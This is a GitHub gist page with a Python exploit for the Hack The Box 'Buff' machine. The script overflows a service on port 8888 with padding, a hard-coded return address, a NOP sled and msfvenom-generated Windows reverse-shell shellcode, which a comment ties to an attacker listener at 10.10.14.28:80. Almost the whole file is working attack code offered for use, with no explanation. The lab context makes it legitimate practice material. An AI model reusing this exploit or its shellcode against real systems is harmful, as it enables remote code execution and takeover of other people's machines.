Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Exploit for the hack the box "buff" machine
import socket
HOST, PORT = '127.0.0.1', 8888
def build(size, offset):
junk = b'A' * offset
eip = b'\xe1\x52\xd6\x68' # 0x68d652e1
# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.28 LPORT=80 -b '\x00' -f py
buf = b""
buf += b"\xb8\xb3\x20\xd4\xc3\xda\xde\xd9\x74\x24\xf4\x5f\x29"
buf += b"\xc9\xb1\x52\x31\x47\x12\x83\xc7\x04\x03\xf4\x2e\x36"
buf += b"\x36\x06\xc6\x34\xb9\xf6\x17\x59\x33\x13\x26\x59\x27"
buf += b"\x50\x19\x69\x23\x34\x96\x02\x61\xac\x2d\x66\xae\xc3"
buf += b"\x86\xcd\x88\xea\x17\x7d\xe8\x6d\x94\x7c\x3d\x4d\xa5"
buf += b"\x4e\x30\x8c\xe2\xb3\xb9\xdc\xbb\xb8\x6c\xf0\xc8\xf5"
buf += b"\xac\x7b\x82\x18\xb5\x98\x53\x1a\x94\x0f\xef\x45\x36"
buf += b"\xae\x3c\xfe\x7f\xa8\x21\x3b\xc9\x43\x91\xb7\xc8\x85"
buf += b"\xeb\x38\x66\xe8\xc3\xca\x76\x2d\xe3\x34\x0d\x47\x17"
buf += b"\xc8\x16\x9c\x65\x16\x92\x06\xcd\xdd\x04\xe2\xef\x32"
buf += b"\xd2\x61\xe3\xff\x90\x2d\xe0\xfe\x75\x46\x1c\x8a\x7b"
buf += b"\x88\x94\xc8\x5f\x0c\xfc\x8b\xfe\x15\x58\x7d\xfe\x45"
buf += b"\x03\x22\x5a\x0e\xae\x37\xd7\x4d\xa7\xf4\xda\x6d\x37"
buf += b"\x93\x6d\x1e\x05\x3c\xc6\x88\x25\xb5\xc0\x4f\x49\xec"
buf += b"\xb5\xdf\xb4\x0f\xc6\xf6\x72\x5b\x96\x60\x52\xe4\x7d"
buf += b"\x70\x5b\x31\xd1\x20\xf3\xea\x92\x90\xb3\x5a\x7b\xfa"
buf += b"\x3b\x84\x9b\x05\x96\xad\x36\xfc\x71\xd8\xcc\xf0\x9d"
buf += b"\xb4\xd2\x0c\x9e\x14\x5a\xea\xf4\x84\x0a\xa5\x60\x3c"
buf += b"\x17\x3d\x10\xc1\x8d\x38\x12\x49\x22\xbd\xdd\xba\x4f"
buf += b"\xad\x8a\x4a\x1a\x8f\x1d\x54\xb0\xa7\xc2\xc7\x5f\x37"
buf += b"\x8c\xfb\xf7\x60\xd9\xca\x01\xe4\xf7\x75\xb8\x1a\x0a"
buf += b"\xe3\x83\x9e\xd1\xd0\x0a\x1f\x97\x6d\x29\x0f\x61\x6d"
buf += b"\x75\x7b\x3d\x38\x23\xd5\xfb\x92\x85\x8f\x55\x48\x4c"
buf += b"\x47\x23\xa2\x4f\x11\x2c\xef\x39\xfd\x9d\x46\x7c\x02"
buf += b"\x11\x0f\x88\x7b\x4f\xaf\x77\x56\xcb\xdf\x3d\xfa\x7a"
buf += b"\x48\x98\x6f\x3f\x15\x1b\x5a\x7c\x20\x98\x6e\xfd\xd7"
buf += b"\x80\x1b\xf8\x9c\x06\xf0\x70\x8c\xe2\xf6\x27\xad\x26"
shellcode = b'\x90' * 16 + buf
junk2 = b'C' * (size - offset - len(eip) - len(shellcode))
payload = junk + eip + shellcode + junk2
assert len(payload) == size
return payload
def send(payload):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(2)
s.connect((HOST, PORT))
s.send(payload)
try:
res = s.recv(1024)
print('Recv: ', res)
except socket.timeout:
print("Boom!")
if __name__ == '__main__':
payload = build(2000, 1052)
send(payload)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.